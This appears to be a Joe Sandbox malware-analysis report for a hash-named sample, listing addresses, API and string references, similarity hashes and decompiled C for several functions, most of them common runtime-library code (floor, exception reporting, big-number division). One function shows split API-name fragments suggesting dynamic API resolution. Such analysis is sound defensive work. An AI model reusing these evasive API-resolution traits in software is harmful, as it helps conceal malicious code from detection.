0x013bdfd3
0x013bdfca
0x013be05c
0x013be061
0x013be070
0x013be073
0x013be07d
0x013be07d
0x013be07f
0x013be081
0x013be087
0x013be08f
0x013be095
0x013be097
0x013be09d
0x013be09f
0x013be0ac
0x013be0a1
0x013be0a1
0x013be0a8
0x013be0a8
0x013be0af
0x013be0b5
0x013be0b6
0x013be0bc
0x013be0bc
0x013be0c1
0x013be0c4
0x013be0c8
0x013be0c8
0x013be0c9
0x013be0cb
0x013be0d1
0x013be0d7
0x00000000
0x00000000
0x00000000
0x013be0d7
0x013bdf7e
0x013be0dd
0x013be0df
0x013be0e2
0x013be0e4
0x013be0e7
0x013be0ed
0x00000000
0x013be0ed
0x013bcd83
0x013bcd7a
0x013bcd71
0x013bcd06
0x013bcd0b
0x013bcd13
0x013bcd27
0x013bcd2c
0x013bcd30
0x013bcd30
0x013bcd33
0x013bcd43
0x013be152
0x013be154
0x013be155
0x013be156
0x013be157
0x013be158
0x013be159
0x013be15e
0x013be16b
0x013bcd49
0x013be12b
0x013be12b
0x013be132
0x013be133
0x013be134
0x013be13d
0x013be142
0x013be14a
0x013be151
0x013be151
0x00000000
0x00000000
0x00000000
0x013bcd13

APIs

__floor_pentium4.LIBCMT ref: 013BCE14

Strings

1#INF, xrefs: 013BE10F
1#IND, xrefs: 013BE0F1
1#SNAN, xrefs: 013BE0FB
1#QNAN, xrefs: 013BE105

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 5ad18e643e6294c67bfc199264b06ea6c413e2198414f7960cbdc09042062acb
Instruction ID: 488461cf4aa098e85bf866e63b42eeff1ba7f371879f94f0c7dc089c5663aea3
Opcode Fuzzy Hash: 5ad18e643e6294c67bfc199264b06ea6c413e2198414f7960cbdc09042062acb
Instruction Fuzzy Hash: F1D26D71E082298FDB65CF68DC807EAB7B9EB44309F1445EAD60DE7640E774AE818F41

Uniqueness

Uniqueness Score: -1.00%

Function 013B11B0 Relevance: 7.6, Strings: 6, Instructions: 109COMMON

Download Yara Rule

Strings

GetP, xrefs: 013B127B
Koad, xrefs: 013B1217
qess, xrefs: 013B1284
`ryA, xrefs: 013B1225
GetSystemInfo, xrefs: 013B11C7, 013B12C0
kernel32.dll, xrefs: 013B11C0, 013B12B2

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID:
String ID: GetP$GetSystemInfo$Koad$`ryA$kernel32.dll$qess
API String ID: 0-3606158385
Opcode ID: cf1c7217c0b627bc4c819dca14a08ef6b6ebacc2df854e8947e4d528121aae98
Instruction ID: 8d625efcd5a00ad70e981e8b661419f6a80ced3dbd69ad902c6842167ce9d522
Opcode Fuzzy Hash: cf1c7217c0b627bc4c819dca14a08ef6b6ebacc2df854e8947e4d528121aae98
Instruction Fuzzy Hash: 4F414BB6A012099FC760CF5DE880AA5F7F5FF88318B2941A5DA04E7716E730B955CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013B22B0 Relevance: 6.1, APIs: 4, Instructions: 73
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E013B22B0(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E013B2474(_t34);
				 *_t60 = 0x2cc;
				_v632 = E013B2C30(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E013B2C30(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E013B2474(_t49);
				}
				return _t49;
			}

0x013b22b0
0x013b22b0
0x013b22b0
0x013b22c4
0x013b22c6
0x013b22c9
0x013b22c9
0x013b22cd
0x013b22d2
0x013b22ea
0x013b22f0
0x013b22f6
0x013b22fc
0x013b2302
0x013b2308
0x013b230e
0x013b2315
0x013b231c
0x013b2323
0x013b232a
0x013b2331
0x013b2338
0x013b2339
0x013b2342
0x013b2348
0x013b234b
0x013b2351
0x013b2360
0x013b236c
0x013b2377
0x013b237e
0x013b2385
0x013b2390
0x013b2398
0x013b23a1
0x013b23a3
0x013b23a6
0x013b23a8
0x013b23b2
0x013b23ba
0x013b23c0
0x00000000
0x013b23c7
0x013b23ca

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 013B22BC
IsDebuggerPresent.KERNEL32 ref: 013B2388
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 013B23A8
UnhandledExceptionFilter.KERNEL32(?), ref: 013B23B2

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 0b83837b50aff522fd3f832139f5ce6c46a1f3a453087a8f945f2268b50b25a4
Instruction ID: 743ffe83969029e2d74e808705ec3fe1e230f1bb3aa406639bdc624c413ce26e
Opcode Fuzzy Hash: 0b83837b50aff522fd3f832139f5ce6c46a1f3a453087a8f945f2268b50b25a4
Instruction Fuzzy Hash: 47312775D013189BDB21DFA4D989BCDBBB8BF08304F1041AAE50DAB250EB71AB858F54

Uniqueness

Uniqueness Score: -1.00%

Function 013B4DC9 Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E013B4DC9(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x13ca014; // 0xfcb69da6
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E013B2474(_t41);
					_pop(_t61);
				}
				E013B2C30(_t66,  &_v804, 0, 0x50);
				E013B2C30(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E013B2474(_t57);
				}
				return E013B1EDB(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x013b4dc9
0x013b4dc9
0x013b4dc9
0x013b4dd4
0x013b4dd9
0x013b4ddb
0x013b4de3
0x013b4de5
0x013b4de8
0x013b4ded
0x013b4ded
0x013b4df9
0x013b4e0c
0x013b4e1a
0x013b4e20
0x013b4e26
0x013b4e2c
0x013b4e32
0x013b4e38
0x013b4e3e
0x013b4e44
0x013b4e4a
0x013b4e50
0x013b4e57
0x013b4e5e
0x013b4e65
0x013b4e6c
0x013b4e73
0x013b4e7a
0x013b4e7b
0x013b4e84
0x013b4e8a
0x013b4e8d
0x013b4e93
0x013b4ea0
0x013b4ea9
0x013b4eb2
0x013b4ebb
0x013b4ec9
0x013b4ecb
0x013b4ee0
0x013b4eec
0x013b4eef
0x013b4ef4
0x013b4f01

APIs

IsDebuggerPresent.KERNEL32 ref: 013B4EC1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 013B4ECB
UnhandledExceptionFilter.KERNEL32(?), ref: 013B4ED8

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d7f72964b0da2ea769e7328da89690ee15e33d3a60d004f00c17f9d99c5a4160
Instruction ID: 383b96a99600314ca634893bcff57300da524b3e82f841f57df5fce5c668e28f
Opcode Fuzzy Hash: d7f72964b0da2ea769e7328da89690ee15e33d3a60d004f00c17f9d99c5a4160
Instruction Fuzzy Hash: A731067590122DABCB21DF68D888BCDBBB8BF18310F5042DAE51DA7651E7309B818F44

Uniqueness

Uniqueness Score: -1.00%

Function 013BC7C0 Relevance: 3.4, APIs: 2, Instructions: 450
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E013BC7C0(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t190;
				signed int _t191;
				intOrPtr _t192;
				signed int _t195;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t204;
				signed int _t210;
				intOrPtr _t216;
				void* _t219;
				signed int _t221;
				signed int _t232;
				void* _t236;
				signed int _t239;
				signed int* _t244;
				signed int _t245;
				signed int* _t246;
				signed int* _t247;
				signed int _t249;
				signed int _t250;
				void* _t251;
				intOrPtr* _t252;
				signed int _t253;
				unsigned int _t254;
				signed int _t256;
				signed int* _t260;
				signed int _t261;
				signed int _t262;
				intOrPtr _t264;
				void* _t268;
				signed char _t274;
				signed int* _t277;
				signed int _t281;
				signed int* _t282;
				intOrPtr* _t289;
				signed int _t291;
				signed int _t292;
				signed int* _t295;
				signed int _t296;
				signed int _t298;
				intOrPtr* _t299;
				signed int _t303;
				signed int _t304;
				signed int _t309;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				void* _t315;
				signed int _t316;
				signed int _t319;
				signed int _t323;
				signed int* _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t329;
				signed int _t334;
				signed int _t341;
				signed int* _t342;

				_t244 = _a4;
				_t325 =  *_t244;
				if(_t325 == 0) {
					L74:
					__eflags = 0;
					return 0;
				} else {
					_t289 = _a8;
					_t190 =  *_t289;
					_v56 = _t190;
					if(_t190 == 0) {
						goto L74;
					} else {
						_t312 = _t190 - 1;
						_t5 = _t325 - 1; // 0x1cb
						_t253 = _t5;
						_v12 = _t253;
						if(_t312 != 0) {
							__eflags = _t312 - _t253;
							if(_t312 > _t253) {
								goto L74;
							} else {
								_t191 = _t253;
								_t291 = _t253 - _t312;
								__eflags = _t253 - _t291;
								if(_t253 < _t291) {
									L19:
									_t291 = _t291 + 1;
									__eflags = _t291;
								} else {
									_t277 =  &(_t244[_t253 + 1]);
									_t341 = _a8 + _t312 * 4 + 4;
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t277;
										if(__eflags != 0) {
											break;
										}
										_t191 = _t191 - 1;
										_t341 = _t341 - 4;
										_t277 = _t277 - 4;
										__eflags = _t191 - _t291;
										if(_t191 >= _t291) {
											continue;
										} else {
											goto L19;
										}
										goto L20;
									}
									if(__eflags < 0) {
										goto L19;
									}
								}
								L20:
								__eflags = _t291;
								if(__eflags == 0) {
									goto L74;
								} else {
									_t192 = _a8;
									_t245 = _v56;
									_t326 =  *(_t192 + _t245 * 4);
									_t55 = _t245 * 4; // 0xffffe913
									_t254 =  *(_t192 + _t55 - 4);
									asm("bsr eax, esi");
									_v52 = _t326;
									_v36 = _t254;
									if(__eflags == 0) {
										_t313 = 0x20;
									} else {
										_t313 = 0x1f - _t192;
									}
									_v16 = _t313;
									_v48 = 0x20 - _t313;
									__eflags = _t313;
									if(_t313 != 0) {
										_t274 = _t313;
										_v36 = _v36 << _t274;
										_v52 = _t326 << _t274 | _t254 >> _v48;
										__eflags = _t245 - 2;
										if(_t245 > 2) {
											_t68 = _t245 * 4; // 0xe850ffff
											_t70 =  &_v36;
											 *_t70 = _v36 |  *(_a8 + _t68 - 8) >> _v48;
											__eflags =  *_t70;
										}
									}
									_t327 = 0;
									_v32 = 0;
									_t292 = _t291 + 0xffffffff;
									__eflags = _t292;
									_v28 = _t292;
									if(_t292 >= 0) {
										_t197 = _t292 + _t245;
										_t247 = _a4;
										_v60 = _t197;
										_v64 = _t247 + 4 + _t292 * 4;
										_t260 = _t247 - 4 + _t197 * 4;
										_v80 = _t260;
										do {
											__eflags = _t197 - _v12;
											if(_t197 > _v12) {
												_t198 = 0;
												__eflags = 0;
											} else {
												_t198 = _t260[2];
											}
											_t296 = _t260[1];
											_t261 =  *_t260;
											_v76 = _t198;
											_v40 = 0;
											_v8 = _t198;
											_v24 = _t261;
											__eflags = _t313;
											if(_t313 != 0) {
												_t303 = _v8;
												_t319 = _t261 >> _v48;
												_t221 = E013C1E90(_t296, _v16, _t303);
												_t261 = _v16;
												_t198 = _t303;
												_t296 = _t319 | _t221;
												_t327 = _v24 << _t261;
												__eflags = _v60 - 3;
												_v8 = _t303;
												_v24 = _t327;
												if(_v60 >= 3) {
													_t261 = _v48;
													_t327 = _t327 |  *(_t247 + (_v56 + _v28) * 4 - 8) >> _t261;
													__eflags = _t327;
													_t198 = _v8;
													_v24 = _t327;
												}
											}
											_push(_t247);
											_t199 = E013C1CD0(_t296, _t198, _v52, 0);
											_v40 = _t247;
											_t249 = _t199;
											_t328 = _t327 ^ _t327;
											_t200 = _t296;
											_v8 = _t249;
											_v20 = _t200;
											_t314 = _t261;
											_v72 = _t249;
											_v68 = _t200;
											_v40 = _t328;
											__eflags = _t200;
											if(_t200 != 0) {
												L37:
												_t250 = _t249 + 1;
												asm("adc eax, 0xffffffff");
												_t314 = _t314 + E013C1D70(_t250, _t200, _v52, 0);
												asm("adc esi, edx");
												_t249 = _t250 | 0xffffffff;
												_t200 = 0;
												__eflags = 0;
												_v40 = _t328;
												_v8 = _t249;
												_v72 = _t249;
												_v20 = 0;
												_v68 = 0;
											} else {
												__eflags = _t249 - 0xffffffff;
												if(_t249 > 0xffffffff) {
													goto L37;
												}
											}
											__eflags = _t328;
											if(__eflags <= 0) {
												if(__eflags < 0) {
													goto L41;
												} else {
													__eflags = _t314 - 0xffffffff;
													if(_t314 <= 0xffffffff) {
														while(1) {
															L41:
															_v8 = _v24;
															_t219 = E013C1D70(_v36, 0, _t249, _t200);
															__eflags = _t296 - _t314;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L44:
																_t200 = _v20;
																_t249 = _t249 + 0xffffffff;
																_v72 = _t249;
																asm("adc eax, 0xffffffff");
																_t314 = _t314 + _v52;
																__eflags = _t314;
																_v20 = _t200;
																asm("adc dword [ebp-0x24], 0x0");
																_v68 = _t200;
																if(_t314 == 0) {
																	__eflags = _t314 - 0xffffffff;
																	if(_t314 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t219 - _v8;
																if(_t219 <= _v8) {
																	break;
																} else {
																	goto L44;
																}
															}
															L48:
															_v8 = _t249;
															goto L49;
														}
														_t200 = _v20;
														goto L48;
													}
												}
											}
											L49:
											__eflags = _t200;
											if(_t200 != 0) {
												L51:
												_t262 = _v56;
												_t315 = 0;
												_t329 = 0;
												__eflags = _t262;
												if(_t262 != 0) {
													_t252 = _v64;
													_t210 = _a8 + 4;
													__eflags = _t210;
													_v40 = _t210;
													_v24 = _t262;
													do {
														_v12 =  *_t210;
														_t216 =  *_t252;
														_t268 = _t315 + _v72 * _v12;
														asm("adc esi, edx");
														_t315 = _t329;
														_t329 = 0;
														__eflags = _t216 - _t268;
														if(_t216 < _t268) {
															_t315 = _t315 + 1;
															asm("adc esi, esi");
														}
														 *_t252 = _t216 - _t268;
														_t252 = _t252 + 4;
														_t210 = _v40 + 4;
														_t153 =  &_v24;
														 *_t153 = _v24 - 1;
														__eflags =  *_t153;
														_v40 = _t210;
													} while ( *_t153 != 0);
													_t249 = _v8;
													_t262 = _v56;
												}
												__eflags = 0 - _t329;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L60:
														__eflags = _t262;
														if(_t262 != 0) {
															_t251 = 0;
															_t299 = _v64;
															_t334 = _a8 + 4;
															__eflags = _t334;
															_t316 = _t262;
															do {
																_t264 =  *_t299;
																_t161 = _t334 + 4; // 0x8d8b5959
																_t334 = _t161;
																_t299 = _t299 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t299 - 4)) = _t264 +  *((intOrPtr*)(_t334 - 4)) + _t251;
																asm("adc eax, 0x0");
																_t251 = 0;
																_t316 = _t316 - 1;
																__eflags = _t316;
															} while (_t316 != 0);
															_t249 = _v8;
														}
														_t249 = _t249 + 0xffffffff;
														asm("adc dword [ebp-0x10], 0xffffffff");
													} else {
														__eflags = _v76 - _t315;
														if(_v76 < _t315) {
															goto L60;
														}
													}
												}
												_t204 = _v60 - 1;
												__eflags = _t204;
												_v12 = _t204;
											} else {
												__eflags = _t249;
												if(_t249 != 0) {
													goto L51;
												}
											}
											_t327 = _v32;
											_t247 = _a4;
											asm("adc esi, 0x0");
											_v64 = _v64 - 4;
											_t298 = _v28 - 1;
											_t313 = _v16;
											_t260 = _v80 - 4;
											_v32 = 0 + _t249;
											_t197 = _v60 - 1;
											_v28 = _t298;
											_v60 = _t197;
											_v80 = _t260;
											__eflags = _t298;
										} while (_t298 >= 0);
									}
									_t246 = _a4;
									_t256 = _v12 + 1;
									_t195 = _t256;
									__eflags = _t195 -  *_t246;
									if(_t195 <  *_t246) {
										_t295 =  &(( &(_t246[1]))[_t195]);
										do {
											 *_t295 = 0;
											_t295 =  &(_t295[1]);
											_t195 = _t195 + 1;
											__eflags = _t195 -  *_t246;
										} while (_t195 <  *_t246);
									}
									 *_t246 = _t256;
									__eflags = _t256;
									if(_t256 != 0) {
										while(1) {
											__eflags = _t246[_t256];
											if(_t246[_t256] != 0) {
												goto L73;
											}
											_t256 = _t256 + 0xffffffff;
											__eflags = _t256;
											 *_t246 = _t256;
											if(_t256 != 0) {
												continue;
											}
											goto L73;
										}
									}
									L73:
									return _v32;
								}
							}
						} else {
							_t7 = _t289 + 4; // 0xfffff89c
							_t304 =  *_t7;
							_v12 = _t304;
							if(_t304 != 1) {
								__eflags = _t253;
								if(_t253 != 0) {
									_t323 = 0;
									_v16 = 0;
									_v40 = 0;
									_v28 = 0;
									__eflags = _t253 - 0xffffffff;
									if(_t253 != 0xffffffff) {
										_t281 = _t253 + 1;
										__eflags = _t281;
										_t282 =  &(_t244[_t281]);
										_v32 = _t282;
										do {
											_t236 = E013C1CD0( *_t282, _t323, _t304, 0);
											_v28 = _t244;
											_t244 = _t244;
											_v68 = _t304;
											_t323 = _t282;
											_v16 = 0 + _t236;
											_t304 = _v12;
											asm("adc ecx, 0x0");
											_v40 = _v16;
											_t282 = _v32 - 4;
											_v32 = _t282;
											_t325 = _t325 - 1;
											__eflags = _t325;
										} while (_t325 != 0);
										_t244 = _a4;
									}
									_v544 = 0;
									_t342 =  &(_t244[1]);
									 *_t244 = 0;
									E013B9BE6(_t342, 0x1cc,  &_v540, 0);
									_t232 = _v28;
									__eflags = 0 - _t232;
									 *_t342 = _t323;
									_t244[2] = _t232;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t244 = 0xbadbae;
									return _v16;
								} else {
									_t324 =  &(_t244[1]);
									_v544 = _t253;
									 *_t244 = _t253;
									E013B9BE6(_t324, 0x1cc,  &_v540, _t253);
									_t239 = _t244[1];
									_t309 = _t239 % _v12;
									__eflags = 0 - _t309;
									 *_t324 = _t309;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t244 =  ~0x00000000;
									return _t239 / _v12;
								}
							} else {
								_v544 = _t312;
								 *_t244 = _t312;
								E013B9BE6( &(_t244[1]), 0x1cc,  &_v540, _t312);
								return _t244[1];
							}
						}
					}
				}
			}

0x013bc7cc
0x013bc7d1
0x013bc7d5
0x013bcc4f
0x013bcc51
0x013bcc57
0x013bc7db
0x013bc7db
0x013bc7de
0x013bc7e0
0x013bc7e5
0x00000000
0x013bc7eb
0x013bc7eb
0x013bc7ee
0x013bc7ee
0x013bc7f1
0x013bc7f6
0x013bc927
0x013bc929
0x00000000
0x013bc92f
0x013bc931
0x013bc933
0x013bc935
0x013bc937
0x013bc95b
0x013bc95b
0x013bc95b
0x013bc939
0x013bc940
0x013bc943
0x013bc943
0x013bc946
0x013bc948
0x013bc94a
0x00000000
0x00000000
0x013bc94c
0x013bc94d
0x013bc950
0x013bc953
0x013bc955
0x00000000
0x013bc957
0x00000000
0x013bc957
0x00000000
0x013bc955
0x013bc959
0x00000000
0x00000000
0x013bc959
0x013bc95c
0x013bc95c
0x013bc95e
0x00000000
0x013bc964
0x013bc964
0x013bc967
0x013bc96a
0x013bc96d
0x013bc96d
0x013bc971
0x013bc974
0x013bc977
0x013bc97a
0x013bc985
0x013bc97c
0x013bc981
0x013bc981
0x013bc98f
0x013bc994
0x013bc997
0x013bc999
0x013bc9a2
0x013bc9a4
0x013bc9ab
0x013bc9ae
0x013bc9b1
0x013bc9b9
0x013bc9bf
0x013bc9bf
0x013bc9bf
0x013bc9bf
0x013bc9b1
0x013bc9c2
0x013bc9c4
0x013bc9cb
0x013bc9cb
0x013bc9ce
0x013bc9d1
0x013bc9d7
0x013bc9da
0x013bc9dd
0x013bc9e6
0x013bc9ec
0x013bc9ef
0x013bc9f2
0x013bc9f2
0x013bc9f5
0x013bc9fc
0x013bc9fc
0x013bc9f7
0x013bc9f7
0x013bc9f7
0x013bc9fe
0x013bca01
0x013bca03
0x013bca06
0x013bca0d
0x013bca10
0x013bca13
0x013bca15
0x013bca20
0x013bca23
0x013bca28
0x013bca2d
0x013bca34
0x013bca39
0x013bca3b
0x013bca3d
0x013bca41
0x013bca44
0x013bca47
0x013bca4f
0x013bca58
0x013bca58
0x013bca5a
0x013bca5d
0x013bca5d
0x013bca47
0x013bca60
0x013bca68
0x013bca6d
0x013bca72
0x013bca74
0x013bca76
0x013bca78
0x013bca7b
0x013bca7e
0x013bca80
0x013bca83
0x013bca86
0x013bca89
0x013bca8b
0x013bca92
0x013bca97
0x013bca9a
0x013bcaa4
0x013bcaa6
0x013bcaa8
0x013bcaab
0x013bcaab
0x013bcaad
0x013bcab0
0x013bcab3
0x013bcab6
0x013bcab9
0x013bca8d
0x013bca8d
0x013bca90
0x00000000
0x00000000
0x013bca90
0x013bcabc
0x013bcabe
0x013bcac0
0x00000000
0x013bcac2
0x013bcac2
0x013bcac5
0x013bcac7
0x013bcac7
0x013bcad5
0x013bcad8
0x013bcadd
0x013bcadf
0x00000000
0x00000000
0x013bcae1
0x013bcae8
0x013bcae8
0x013bcaeb
0x013bcaee
0x013bcaf1
0x013bcaf4
0x013bcaf4
0x013bcaf7
0x013bcafa
0x013bcafe
0x013bcb01
0x013bcb03
0x013bcb06
0x00000000
0x00000000
0x013bcb08
0x013bcb06
0x013bcae3
0x013bcae3
0x013bcae6
0x00000000
0x00000000
0x00000000
0x00000000
0x013bcae6
0x013bcb0d
0x013bcb0d
0x00000000
0x013bcb0d
0x013bcb0a
0x00000000
0x013bcb0a
0x013bcac5
0x013bcac0
0x013bcb10
0x013bcb10
0x013bcb12
0x013bcb1c
0x013bcb1c
0x013bcb1f
0x013bcb21
0x013bcb23
0x013bcb25
0x013bcb2a
0x013bcb2d
0x013bcb2d
0x013bcb30
0x013bcb33
0x013bcb36
0x013bcb38
0x013bcb4d
0x013bcb4f
0x013bcb51
0x013bcb53
0x013bcb55
0x013bcb57
0x013bcb59
0x013bcb5b
0x013bcb5e
0x013bcb5e
0x013bcb62
0x013bcb64
0x013bcb6a
0x013bcb6d
0x013bcb6d
0x013bcb6d
0x013bcb71
0x013bcb71
0x013bcb76
0x013bcb79
0x013bcb79
0x013bcb7e
0x013bcb80
0x013bcb82
0x013bcb89
0x013bcb89
0x013bcb8b
0x013bcb90
0x013bcb92
0x013bcb95
0x013bcb95
0x013bcb98
0x013bcba0
0x013bcba0
0x013bcba2
0x013bcba2
0x013bcba7
0x013bcbad
0x013bcbb1
0x013bcbb4
0x013bcbb7
0x013bcbb9
0x013bcbb9
0x013bcbb9
0x013bcbbe
